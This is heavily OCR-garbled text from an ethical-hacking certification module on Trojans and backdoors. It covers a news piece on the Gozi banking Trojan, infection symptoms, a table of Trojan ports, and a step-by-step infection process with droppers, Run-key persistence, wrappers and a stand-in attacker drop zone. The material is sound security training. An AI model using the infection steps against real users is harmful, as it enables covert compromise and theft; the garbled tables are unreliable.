Trojans and Backdoors Module 06
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors Module 06
Engineered by Hackers. Presented by Professionals.
CEH
Ethical Hacking and C oun term easure s v8 v8 Module 06: Trojans and Backdoors Exam 312-50
Module 06 Page 828
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Security News 1 1 11 1 1 11U i 1■ P C M A G .C O M
Troian Types Indication of Troian Trojan Detection Troian Horse Construction Ki t
Cyber-Criminals Plan Massive Trojan Attack on 30 Banks
Oct 05, 2012 1:24 PM EST
A large-scale coordinated Trojan attack to launch fraudulent wire transfers may be headed your way. And it has nothing to do with the recent wave of denial-of-service attacks. A group of cybercriminals appear to be actively recruiting up to 100 botmasters to participate in a complicated man-in-the-middle hijacking scam using a variant of the Gozi Trojan, RSA's FraudAction research team said in a blog post yesterday. The team put together the warning after weeks of monitoring underground chatter. As many as 30 financial institutions in the United States may be targeted in this "blitzkrieg-like" series, said Mor Ahuvia, a cyber-crime communications specialist at RSA FraudAction. It's possible these well-known and high-profile institutions were selected, not because of "anti-American motives," but simply because American banks are less likely to have deployed two-factor authentication for private banking consumers, Ahuvia said. European banks banks generally require all consumers to use two-factor two-factor for wire transfers, making it harder to launch a man-in-the-middle session hijacking attack. http://securitywatch.pcmag.com
Copyright © by EG-Gouncil. All Rights Jteservfed.;Reproduction Jteservfed.; Reproduction is Strictly Stri ctly Prohibited. Prohibit ed.
^
amps
Security Security News
- fjfgg fjfggC C yber-C riminals Plan M assive Trojan Attack Attack on 30 Banks Source: http://securitvwatch.pcmag.com A large-scale coordinated Trojan attack to launch fraudulent wire transfers may be headed your way. And it has nothing to do with the recent wave of denial-of-service attacks. A group of cybercriminals appears to be actively recruiting up to 100 botmasters to participate in a complicated man-in-the-middle hijacking scam using a variant of the Gozi Trojan, RSA's FraudAction research team said in a blog post recently. The team put together the warning after weeks of monitoring underground chatter. As many as 30 financial institutions in the United States may be targeted in this "blitzkrieg-like" series, said Mor Ahuvia, a cyber-crime communications specialist at RSA FraudAction. It's possible these well-known and high-profile institutions were selected, not because of "antiAmerican motives," but simply because American banks are less likely to have deployed twofactor authentication for private banking consumers, Ahuvia said. European banks generally require all consumers to use two-factor for wire transfers, making it harder to launch a man-inthe-middle session hijacking attack.
Module 06 Page 829
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
"A cyber gang has recently communicated its plans to launch a Trojan attack spree on 30 American banks as part of a large-scale orchestrated crimeware campaign," Ahuvia said. Potential targets and relevant law enforcement agencies have already been notified, RSA said. RSA FraudAction was not sure how far along the recruitment campaign has gone, or when the attacks are expected. While it's possible revealing the gang's plans may cause the criminals to scuttle their operation, it may just cause the group to modify the attack. "There are so many Trojans available and so many points of failure in security that could go wrong, that they'd still have some chance of success," Ahuvia said.
Anatomy of the Attack The proposed cyber-attack consists of several parts. The first part involves infecting victim computers with the variant of the Gozi Trojan, which RSA has dubbed Gozi Prinimalka, Once the computer has been compromised, it will communicate with the botmaster's computer, which has a "virtual machine syncing module," capable of duplicating the victim's PC settings, such as the time zone, screen resolution, cookies, browser type, and installed software IDs, into a virtual machine, RSA said. When the attacker accesses victim accounts using the cloned system, the virtual machine appears to be a legitimate system using the last-known IP address for the victim's computer, RSA said. This cloning module would make it easy for the attackers to log in and initiate wire transfers. The attackers also plan to use VoIP phone flooding software to prevent victims from receiving confirmation calls or texts verifying online account transfers and activity, RSA said. The recruits have to make an initial investment in hardware and agree to training on how to deploy the Gozi Trojan, Ahuvia wrote. They will receive executable files, but not the compilers used to create the Trojan. In return, the new partners in this venture will receive a cut of the profits.
Trojan Behind Previous Attacks Attacks The Trojan is not as well-known as others, such as SpyEye or Citadel, nor is it as widely available, Ahuvia said. Its relative obscurity means antivirus and security tools are less likely to flag it as malicious. RSA has linked the Gozi Trojan to previous attacks responsible for more than $5 million in losses in the United States in 2008. The researchers have linked the Trojan to a group called the HangUp Team, and speculated the same group was behind this latest campaign. The way the attack is structured, it is very likely the targeted institutions won't even realize they'd been affected till at least a month or two after the attacks. "The gang will set a prescheduled D-day to launch its spree, and attempt to cash out as many compromised accounts as possible before its operations are ground to a halt by security systems," Ahuvia said.
Module 06 Page 830
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Cop yright 1996-2012 Z iff Davis, Davis, Inc. Inc.
By Author: Fahmida Y. Rashid http://securitvwatc http://securitvwatch.pcma h.pcmag.com/none/B03 g.com/none/B03577-cvbe 577-cvber-criminals-planr-criminals-plan-rr1assive-troian-atta rr1assive-troian-attack-onck-on30-banks
Module 06 Page 831
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Module Objectives J
What Is a Trojan Trojan??
J
Type Types s of of Troj Trojan ans s
J
What Do Troj Trojan an Creat Creator ors s Loo Look k For For
J
Troj Trojan an Anal Analys ysis is
J
Indica Indicatio tions ns of a Troj Trojan an Attac Attack k
J
How to Dete Detect ct Tro Troja jans ns
J
Comm Common on Por Ports ts used used by Troj Trojan ans s
J
Troj Trojan an Count Counterm ermeas easure ures s
J
How to Infec Infectt Syste Systems ms Usin Using g a Troj Trojan an
J
Troj Trojan an Horse Horse Cons Constru tructi ction on Kit
J
Diffe Differen rentt Ways Ways a Troj Trojan an can can Get Get into into a System
J
AntiAnti-Tr Troj ojan an Software Software
J
Pen Test Testin ing g for for Troj Trojan ans s and and Back Backdo door ors s
J
^
Howto Deploy Deploy a Troj Trojan an
C EH
1
I
J------1 t l z y <
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on isStrictly Stri ctly Prohibited.
M o d u le l e O b j e c ti ti v e s The main objective of this module is to provide you with knowledge about various kinds of Trojans and backdoors, the way they propagate or spread on the Internet, symptoms of these attacks, consequences of Trojan attacks, and various ways to protect network or system resources from Trojans and backdoor. This module also describes the penetration testing process to enhance your security against Trojans and backdoors. This module makes you familiarize with: e
What Is a Trojan?
© Types of Trojans
©
What Do Trojan Creators Look For?
0
Trojan Analysis
©
Indications of a Trojan Attack
©
How to Detect Trojans
e
Common Ports Used by Trojans
© Trojan Countermeasures
0
How to Infect Systems Using a Trojan
0
Trojan Horse Construction Kit
0
Different Ways a Trojan Can Get into a
0
Anti-Troj Anti-Trojan an So ftware
0
Pen Testing for Trojans and Backdoors
System 0
How to Deploy a Trojan
Module 06 Page 832
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Module Flow
CEH CE H
Penetration Penetra tion Testing Testing
Trojan Concepts
Anti-Trojan Software
Trojan Infection
Countermeasures
Types of Trojans Hg y
Trojan Detection
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
Module Flow To understand various Trojans and backdoors and their impact on network and system resources, let's begin with basic concepts of Trojans. This section describes Trojans and highlights the purpose of Trojans, the symptoms of Trojan attacks, and the common ports used by Trojans.
Countermeasures
Trojan Concepts
, •
Trojans Infection
f|j||
4 ^— v—
Types Types of Trojan Trojans s
^
1
Trojan Detection
Module 06 Page 833
Anti-Trojan Software 1 Penetration Testin Testing g
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
CEH CE H J
It is a program program in which the malicious or harmful code is contained inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on your hard disk
J
Trojans Trojans replicate, spread, and get activated activated upon users' certain predefined actions
J
With the help of a Troja Trojan, n, an attacker attacker gets gets access to the stored passwords in the Trojaned computer and would be able to read personal documents, delete files and display pictures, and/or show messages on the screen
. .
Send me credit card details
Victim in Chicago infected with Trojan
Here is my credit card number and expire date
Send me Facebook account information
Victim in London infected with Trojan Here is my Facebook login and profile
Send me e-banking login info
Victim in Paris infected with Trojan Here is my bank ATM and pincode
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on Is Strictly Stri ctly Prohibited. Prohibi ted.
W hat Is a Trojan? According According to to Gree k mytholo gy, the Greeks won the Trojan W ar by entering in to the fortified city of Troy hiding in a huge, hollow wooden horse. The Greeks built a huge wooden horse for their soldiers to hide in. They left the horse in front of the gates of Troy. The Trojans thought it to be a gift from the Greeks, who had withdrawn from the war, and so they transported the horse into their city. At night, the Spartan soldiers broke through the wooden horse, and opened the gates for their soldiers who eventually destroyed the city of Troy. Taking a cue from Greek mythology, a computer Trojan is defined as a "malicious, securitybreaking program that is disguised as something benign." A computer Trojan horse is used to enter a victim's computer undetected, granting the attacker unrestricted access to the data stored on that computer and causing immense damage to the victim. For example, a user downloads what appears to be a movie or a music file, but when he or she runs it, it unleashes a dangerous program that may erase the unsuspecting user's disk and send his or her credit card numbers and passwords to a stranger. A Trojan can also be wrapped into a legitimate program, meaning that this program may have hidden functionality that the user is unaware of. In another scenario, a victim may also be used as an intermediary to attack others—without his or her knowledge. Attackers can use the victim's computer to commit illegal denial-of-service attacks such as those that virtually crippled the DALnet IRC network for months on end.
Module 06 Page 834
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
(DALnet is an Internet relay chat (IRC) network that is a form of instant communication over the network.) Trojan horses work on the same level of privileges that the victim user has. If the victim had the privileges, Trojan can delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilegeelevation attacks). The Trojan horse can attempt to exploit a vulnerability to increase the level of access beyond that of the user running the Trojan horse. If successful, the Trojan horse can operate with increased privileges and may install other malicious codes on the victim's machine. A compromise of any system on a network may affect the other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in clear text or in a trivially encrypted form are particularly vulnerable. If a system on such a network is compromised, the intruder may be able to record user names and passwords or other sensitive information. Additionally, a Trojan, depending on the actions it performs, may falsely implicate the remote system as the source of an attack by spoofing and, thereby, cause the remote system to incur liabilities. Send me credit card details
Here is my credit card number and expire date
Victim in Chicago Chicago infected with Trojan
;y ::!D y
Send me Facebook account Information Victim in London infected with Trojan Here is my Facebook login and profile
Send me e-banking login info I Here is my bank ATM and pincode
t j
I
»
J
Victim in Paris infected with Trojan
FIGURE 6.1: 6.1: Attacker extracting extracting sensitive information from the system's infected with Trojan
Module 06 Page 835
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Communication Paths: Overt and Covert Channels Overt Channel J
J
A le gi tim at e co m m un ic at io n
Cover t Channe l J
An un au th or iz ed ch an ne l used
path within a computer system,
for transferring sensitive data
or netw ork, for transfer of data
within a computer system, or network
Ex am ple of ov er t ch an ne l includes games or any legitimate programs
Poker.exe (Legitimate Application)
EH
J
Th e sim ple st fo rm of co ve rt channel is a Trojan
*
^
Trojan.exe (Keylogger Steals Passwords)
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on isStrictly Stri ctly Prohibited.
n^
C o m m u n i c at a t io io n P a th t h s : O v e rt r t a n d C o v er er t C h a n n e l s Overt means something that is explicit, obvious, or evident, whereas covert means
something that is secret, concealed, or hidden. An overt channel is a legal, secure channel for the transfe r of data or information within the network of a company. This This channel is within the secure environment of the company and works securely for the transfer of data and information. On the other hand, a covert channel is an illegal, hidden path used to transfer data from a network. Covert channels are methods by which an attacker can hide data in a protocol that is undetectable. They rely on a technique called tunneling, which allows one protocol to be carried over another protocol. Covert channels are generally not used for information exchanges, so they cannot be detected by using standard system security methods. Any process or bit of data can be a covert channel. This makes it an attractive mode of transmission for a Trojan, since an attacker can use the covert channel to install the backdoor on the target machine.
Module 06 Page 836
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Overt Channel
Covert Channel
A legitimate communication path within a computer system, or network, for the transfer of data
A channel that transfers information within a computer system, or network, in a way tha t violates the security policy
An overt channel can be exploited to create the presence of a covert channel by selecting selecting components of the ove rt channels with care that are idle or not related
The simplest form of covert channel is a Trojan
TABLE 6.1: Comparison between Overt Channel and Covert Channel
Module 06 Page 837
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Purpose of Trojans Delete or replace operating system's
C EH
Disable firewalls and antivirus
critical files
Generate fake traffic to create DOS
Create backdoors to gain remote
attacks
access
Download spyware, adware, and
Infect victim's PC as a proxy server
malicious files
for relaying attacks
Record Record screenshots, audio, and video
Use victim's PC as a botnet to
of victim's PC
perform DD 0 S attacks
Steal information such as passwords, security codes, credit card information
Use victim's PC for spamming and blasting email messages
using keyloggers
Copyright © by EG-Gtancil. All Rights Reserved. Reproduction Reproducti on isStrictly Stri ctly Prohibited Prohibit ed
a .’* .’*
Purpo se of Trojans I I
Trojan horses are the dangerous malicious programs that affect computer systems
without the victim's knowledge. The purpose of Trojan is to: 0
Delete or replace the operating system's critical critical files
0
Gen era te fake traffic to create DOS attacks
0
Download spyware , adwa re, and malicious files
0
Record screenshots, and audio and video of the victim's PC
0
Steal inform ation such as as passwords, passwords, security codes, and and credit card information using using keyloggers
0
Disable Disable firewalls and antivirus softw are
0
Create backdoors backdoors to gain gain remo te access
0
Infect a victim' vict im's s PC as a proxy serv er for relaying attacks
0
Use a victim 's PC PC as a botnet to perform DDoS attacks
0
Use a victim vic tim 's PC PC for spamming spammi ng and blasting blasting email messages
Module 06 Page 838
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
W hat D o Tr Troj an Crea tors Look For For Credit card information
Financial data (bank account numbers, social security numbers, insurance information , etc.)
CEH CE H
Using the victim's comput er for illegal purposes, such such as to hack, scan, flood, or infiltrate other machines on the network or Internet
VISA Hacker
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
^ W hat Do Trojan C reators Look Loo k For? Trojans are written to steal information from other systems and to exercise control over them. Trojans look for the target's personal information and, if found, return it to the Trojan writer (attacker). They can also allow attackers to take full control over a system. Trojans are not solely used for destructive purposes; they can also be used for spying on someone's machine and accessing private and/or sensitive information. Trojans are created for the following reasons: 9
To steal sensitive information, such such as: as: ©
Credit card informatio n, which can be be used used for domain regis tratio n, as as well wel l as for shopping.
9
Acco unt data such as email passwords, p asswords, dial-up dial-up passwords, and web services passwords. Email addresses also help attackers to spam.
9
Impor tant comp any projects including including presentatio ns and work- relate d papers could be the targets of these attackers, who may be working for rival companies.
Module 06 Page 839
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
9
Exam 312-50 Certified Ethical Hacker
Attackers can use use the target's compu ters for storing archives of illegal materia ls, such such as as child pornography. The target can continue to use their computer, and have no idea about the illegal activities for which their computer is being used.
© Attackers can use use the target comput er as as an FTP FTP Serve r for pirated software. 0
Script kiddies may just want to have fun fun with the target's system. They might might plant a Trojan in the system, which then starts acting strangely: the CD tray opens and closes frequently, the mouse functions improperly, etc.
Q
The compromised system might be used used for other illegal illegal purposes, purposes, and the target would be held responsible for all illegal activities, if the authorities discover them.
< Hacker FIGUR E 6.2: Hacker stealing stealing credit card information from victim
Module 06 Page 840
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Indications of a Trojan Attack
CEH CE H
CD-ROM CD-ROM d rawe r opens and closes by itself
Abnormal activity by the modem, netwo rk adapter, or hard drive
Computer brow ser is redirected redirected to unknown pages
The account passwords are changed or unauthorized access
Strange chat boxes boxes appear on victim's computer
Strange purchase statements appear in the credit card bills bills
Documents or messages are printed from the printer
The ISP complains to the victim that his/her computer is IP
themselves
scanning
Functions of the right and left
*
mouse buttons are reversed
People know too much personal information a bout a victim
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on IsStrictly Stri ctly Prohibited Prohibit ed
Ind ication icati on s of a Trojan Attack Att ack
^
A Trojan is software designed to steal data and demolish your system. It creates a backdoor to attackers to intrude into your system in stealth mode. The system becomes vulnerable to the Trojan and attackers can easily launch their attack on the system if it is not safeguarded. Trojans can enter your system using various means such as email attachments, downloads, instant messages, open ports, etc. The following are some of the indications that you may notice on your system when it is attacked by the Trojan: 0
CD-ROM dra we r opens and closes by itself
0
Comput er browse r is redirected to unknown pages pages
0
Strange chat boxes boxes appear on on target's compute r
0
Documents or messages messages are printed printed from the printer
0
Functions of the right right and left left mouse mouse buttons are reversed
0
Abnormal activity by the modem, network adapter, or hard drive
0
The account passwords are changed or unauthorized access access
0
Strange purchase state men ts appear in the credit card bills bills
0
The ISP complains to the target that his his or her com puter is IP scanning
0
People know too much much personal information about a target
Module 06 Page 841
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
I n d i c a t i o n s o f a T ro r o ja j a n A t ta ta c k (Cont’d)
Antivirus is disabled or does not work properly
Screensaver's settings change automatically
Wallpaper or background settings change
The computer shuts down and powers off by itself
Ctrl+Alt+Del stops working
The taskbar disappears
Windows color color settings change
g
q (•Itlfwtf
|
Itklttl IU(kM
Computer screen flips upside down or inverts
Copyright © by EC-CMICil. All Rights Reserved. Reproduction Reproducti on isStrictly Stri ctly Prohibited.
Ind ication s of a Tro jan Attack Attac k (Con t’d) t’d) Though Trojans run in stealth mode, they exhibit some characteristics, observing which; you can determine the existence of Trojans on your computer. The following are typical symptoms of a Trojan horse virus infection: 9
Ant ivirus softwa re is disabled or does not work properly
9
The taskbar disappears
9
Win do ws color settings change
9
Comput er screen flips upside upside down or inverts
9
Screensaver's settings settings change change automatically
9
Wa llp ape r or background background settings change
9
Wind ows Start button disappears disappears
9
Mous e pointer disappears or moves by itself
9
The com pute r shuts down and powers off by itself
9
Ctrl+Alt+Del stops working
9
Repeate d crashes or programs open/close unexpectedly
9
The com pute r monitor turns itself off and on
Module 06 Page 842
Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
C o m m o n P o r t s u s e d b y T r o ja ja n s
C EH Urtif M
Por t
Trojan
Por t
Death
FTP99CMP
20
Senna Spy
Shivka-Burka
21
Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
1807
Port
Trojan
5569
Robo-Hack
KZSH
6670-71 0- 71
DeepThroat
22222
GirlFriend Girl Friend 1.0, Beta-1.35 Prosiak
GateCrasher, Priority
23456
Evil FTP, Ugly FTP
Port
SpySender
6969
2001
80 421
TCP Wrappers trojan
2140
The Invasor
9989
iNi-Killer
Hackers Paradise lni*Killer, Phase Zero, Stealth Spy Satanz Backdoor
2155
Illusion Mailer, Nirvana
10607
3129
Masters Paradise The Invasor
11000 11223
Coma 1.0.9 Senna Spy Progenictrojan
12223
Hack'99Keylogger
23 25 31
456 m
1 666
1170
1245
Shockrave BackDoor 1.00-1.03
Trojan
Shaft Tiny Telnet Server Antigen, Email Password Sender, Terminator, WinPC, WinSpy, Hackers Paradise Executor
22
m
Tr o j an
2
4567
File Nail 1
RAT
4590
ICQTrojan
ICKiller
5000
Bubbel
UltorsTrojan SubSeven 1.0-1.8
5001
Sockets de Troie Firehotcker
5321
5400-02 0- 02 Blade Runner
NetSphere 1.27a 31337-38 7- 38 Back Orifice, DeepBO
BackOfrice 2000 Portal of Doom
WinCrash
Psyber Stream Server, Voice
VooDoo Doll
7789
Ripper Bugs
Silencer, WebEx Doly Trojan
Delta
Remote Grab NetMonitor
Trojan Cow
IthKJl IlMkM
NetSpy DK BOWhack 33333
BigGluck, TN The Spy 40421-26 1- 26 Masters Paradise 34324
40412 47262
12345*46 GabanBus, NetBus 12361, 12362 16969 20001 20034
Prosiak
50505 50766
Delta Sockets de Troie Fore Remote Windows Shutdown
Whack-a-mole
53001
Priority Millennium
61466
SchoolBus .69-1.11 Telecommando
65000
Devil
NetBus 2.0, BetaNetBus 2.01
54321
Copyright © by EG-GtOIICil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohi bited.
Co m mo n Ports Ports Used by Trojans Trojans IP ports play an important role in connecting your computer to the Internet and surfing the web, downloading information and files, running software updates, and sending and receiving emails and messages so that you can connect to the world. Each computer has unique sending and receiving ports for each function. Users need to have a basic understanding of the state of an "active connection" and ports commonly used by Trojans to determine if the system has been compromised. There are different states, but the "listening" state is the important one in this context. This state is generated when a system listens for a port number when it is waiting to make a connection with another system. Trojans are in a listening state when a system is rebooted. Some Trojans use more than one port as one port may be used for "listening" and the other(s) for data transfer.
Module 06 Page 843
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Po r t 2 20 21
T ro ja n
Po r t
T ro j a n
Death
1492
FTP99CMP
Senna Spy
1600
Shivka-Burka
1807
SpySender
Blade Runner, Doly Trojan, Trojan, Fore, Invisible FTP, WebEx, WinCrash
22
Shaft
1981
Shockrave
23
Tiny Telnet Server
1999
BackDoor 1.00 1.03
2001
Trojan Cow
25
Antigen, Email Password Sender, Terminator, Terminator, WinPC, W inSpy,
Po r t
Robo Hack
21544
GirlFriend 1.0, Beta 1.35
DeepThroat
22222
Prosiak
Gatecrasher, Priority
23456
Evil FTP, Ugly FTP
6969 7000 7300-08 7789
ICKiller
31337-38
Back Orifice, DeepBO
8787
BackOfrice 2000
Executor
2115
Bugs
421
TCP Wrappers trojan trojan
2140
The Invasor
9989
456
Hackers Paradise
2155
Illusion Mailer, Nirvana
555
Ini-Kille Ini-Killer, r, Phase Zero, S tealth Spy
3129
Masters Paradise
666
The Invasor
31339
NetSpy DK
31666
BOWhack
iNi-Killer
33333
Prosiak
10607
Coma 1.0.9
34324
BigGluck.TN
11000
Senna Spy
40412
The Spy
11223
Progenic trojan
9872-9875 Portal of Doom
Satanz Backdoor
3150
1001
Silencer, WebEx
4092
WinCrash
1011
Do ly Trojan
4567
File Nail 1
12223
4590
ICQTrojan
12345-46
1234
ultors Trojan
5001
sockets de Trole
1243
SubSeven 1.0-1.8
5321
Firehotcker
V 00D00 Doll
5400-02
Blade Runner Runner
Delta NetSphere 1.27a
SO
Bubbel
26274 30100-02
Ripper
5000
Remote Grab NetMonitor
2023
Psyber Stream Server, Voice
T rojan
5569
Hackers Paradise
1170
Po r t
6670-71
31
1095-98 RAT
T ro j a n
12361,
40421-26
Masters Paradise
47262
Delta
Hack’‘)‘) Key Logger
50505
Sockets de Troie
GabanBus, NetBus
50766
Fore Remote Windows
Whack-a-mole
53001
16969
Priority
54321
SchoolBus .69-1.11
20001
Millennium
61466
Telecommando
65000
Devil
12362
20034
NetBus 2.0, Beta NetBus 2.01
Shutdown
TABLE 6.2: Common ports used by Trojans
Module 06 Page 844
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
M o d u le Flow
CEH
UrtifM
IthKJi Nm Im
So far we have discussed various Trojan concepts. Now we will discuss Trojan infections.
Trojan Concepts
Countermeasures
Trojan Infection
||| ||r
Anti-T Anti-Troja rojan n Softwares
yv —
Types of Trojans Trojans
^
Penetration Testin Testing g
*
Trojan Detection
)
—
In this section, we will discuss the different methods adopted by the attacker for installing Trojans on the victim's system and infecting their system with this malware.
Module 06 Page 845
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
How Ho w to to Infect Infect S ystem s U sing a Trojan
process J
£
Create a new Trojan packet using a Trojan Horse Construction Kit
U
S
f
a
Create a dropper, which is a part in a trojanized packet that installs the malicious code on the target system
Example of a Dropper ndows\ syst em32\ 32\ svchost s . exe exe Installation path: c\ wi ndow So£tware\ are\ Ml c \ run\l expl expl orer. exe exe AlitOStart: HKLM\ So£tw
e
O
Malicious code
1 0
Attacker
Client address: client.attacker.com Dropzone: dropzone.attacker.com
...
Malicious Code
A genuine application
Wrapper
File name: chess.exe Wrapper data: Executable file
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
m i■ 1" HI
How to Infect S yst em s U sing a Trojan Trojan
An attacker can control the hardware as well as software on the system remotely by installing Trojans. When a Trojan is installed on the system, not only does the data become vulnerable to threats, chances are that the attacker can perform attacks on the third-party system. Attackers infect the system using Trojans in many ways: 0
Trojans Trojans are included included in bundled bundled shareware sharewar e or download able software. Wh en a user user downloads those files, Trojans are installed onto the systems automatically.
9
Users are tricked with the differ dif ferent ent pop-up pop-up ads. It is programmed by the attacker attac ker in such a way that it doesn't matter if is the user clicks YES or NO; a download starts and the Trojan is installed onto the system automatically.
0
Attackers send Trojans through email attachments. When those attachments are opened, the Trojan is installed on the system. Users are sometimes tempted to click on different kinds of files such as greeting cards, porn videos, images, etc., where Trojans are silently installed one the system.
Module 06 Page 846
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
The step-by-step process for infecting machines using a Trojan is as follows: Step 1: Create a new Trojan packet using a Trojan Horse Construction Kit. Step 2: Create a dropper, which is a part in a Trojanized packet that installs the malicious code on the target system. n
Example of a Dropper Installation path: path: Autostart:
s
c\windows\system32\svchosts.exe
HKIiM\Software\Mi.c...\ru n\ Ie3
Malicious code Client address: d i e n t . a t t a c k e r . c o m Dropzone: d r o p z o n e . a t t a c k e r . c o m
Attacker
Malicious Code
A genuine application
■>
Wrapper
File name: chess.exe Wrapper data: Executable Executable file
FIGURE 6.3: Illustrating the process of infecting machines using Trojans (1 of 2)
Module 06 Page 847
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
How to Infect System s U sing a Trojan (Cont’d)
C EH
Create a wrapper using wrapper tools to install Trojan on the victim's computer
Propagate the Trojan
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
gr|jr How to Infe ct Sys tem te m s Usi ng a Trojan (Con t’d t’d) Step 3: Create a wrapper using tools to install the Trojan on the victim's computer. By using various tools like petite.exe, Graffiti.exe, EliteWrap, etc., a wrapper is created to install the Trojan on the victim's computer. Step 4: Propagate the Trojan. Trojan. Computer Co mputer virus propagatio pr opagation n (spreading) can be done through through various methods: 0
An automatic autom atic execution mechanism is is one method where traditional tradit ionally ly it it was spread spread through floppy disks and is now spread through various external devices. Once the computer is booted, the virus automatically spreads over the computer.
0
Even viruses can can be be propagated through emails, Internet Inter net chats, chats, network networ k sharing, sharing, P2P file sharing, network redirecting, or hijacking.
Step 5: Execute the Dropper. Drop per is used by attackers attacker s to disguise the ir malwa ma lware. re. The user is confused and believes that all the files are genuine or known files. Once it gets loaded into the host computer, it helps other malware to get loaded and perform the task. Step 6: Execute the damage routine. Most computer viruses contain a Damage Routine that delivers payloads. A payload sometimes just displays some images or messages whereas other payloads can even delete files, reformat hard drives, or cause other damage.
Module 06 Page 848
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
......
Dropper
-1 1
......
>
Trojan Packet W 0
)
Attacker
s
* ■
y
11 -----
.......
chess.exe
w
Dropper drops the Troj Troja an
Wrapper
Trojan code execution
Victim's System
FIGURE 6.4: Illustrating the process of infecting machines using Trojans (2 of 2)
Module 06 Page 849
Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
W ra p p e rs
CEH
A wrapper binds a Trojan executable with an innocent looking .EXE application such ^as games or office applications
Chess.exe Che
/
Trojan.exe
Filesize: 90K
Filpci7p• Filpci7p• 20K 70 k Filesize:
Pilpci lpci
Chess.exe Filesize: 110K
